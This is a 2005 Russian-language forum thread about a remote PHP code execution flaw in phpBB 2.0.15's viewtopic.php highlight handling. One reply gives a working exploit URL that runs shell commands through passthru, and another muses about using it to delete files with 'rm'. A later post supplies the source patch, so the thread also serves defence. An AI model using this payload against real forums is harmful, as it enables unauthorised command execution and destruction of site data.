Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Уязвимости форумов phpbb 2.0.15 |
30.06.2005, 17:10
|
|
Новичок
Регистрация: 22.04.2005
Сообщений: 15
Провел на форуме:
9155
Репутация:
0
|
|
Уязвимости форумов phpbb 2.0.15
Выполнение произвольного PHP сценария в phpBB в коде highlighting
Программа: phpBB 2.0.15
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его.
Последний раз редактировалось exbbxak; 14.07.2005 в 18:53..
|
|
|
30.06.2005, 17:28
|
|
Новичок
Регистрация: 17.05.2005
Сообщений: 22
Провел на форуме:
34274
Репутация:
0
|
|
Учись
http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'
|
|
|
|
30.06.2005, 17:30
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524
Репутация:
9
|
|
ни че не происходит!
|
|
|
|
30.06.2005, 17:51
|
|
Новичок
Регистрация: 22.04.2005
Сообщений: 15
Провел на форуме:
9155
Репутация:
0
|
|
спасиб посмотрим
|
|
|
|
30.06.2005, 17:54
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524
Репутация:
9
|
|
Если че найдешь то соообщи!
|
|
|
|
30.06.2005, 18:10
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524
Репутация:
9
|
|
Незнаю, почем, но когда я выполняю его, то у меня страница грузиться намного дольше... Но на странице ничего нет, если команда "ls" выполняется невидимо, то можно было вместо "ls" поставить "rm viewtopic.php" и страница бы уже не грузилась... Но ничего не происходит!
|
|
|
|
30.06.2005, 18:34
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме:
96115
Репутация:
5
|
|
ох уж мне этот пхпББ... =)
|
|
|
|
30.06.2005, 18:43
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
защита:
открыть viewtopic.php
найти:
$message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . str_replace('\\', '\\\\', $highlight_match) . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));
заменить на:
$message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . str_replace('\\', '\\\\', addslashes($highlight_match)) . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));
|
|
|
|
30.06.2005, 18:48
|
|
Новичок
Регистрация: 22.04.2005
Сообщений: 15
Провел на форуме:
9155
Репутация:
0
|
|
Green_Bear
спасибо
|
|
|
|
30.06.2005, 20:38
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме:
96115
Репутация:
5
|
|
а еще лучшая защита - перейти на ипб или воблу. я уже. =)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
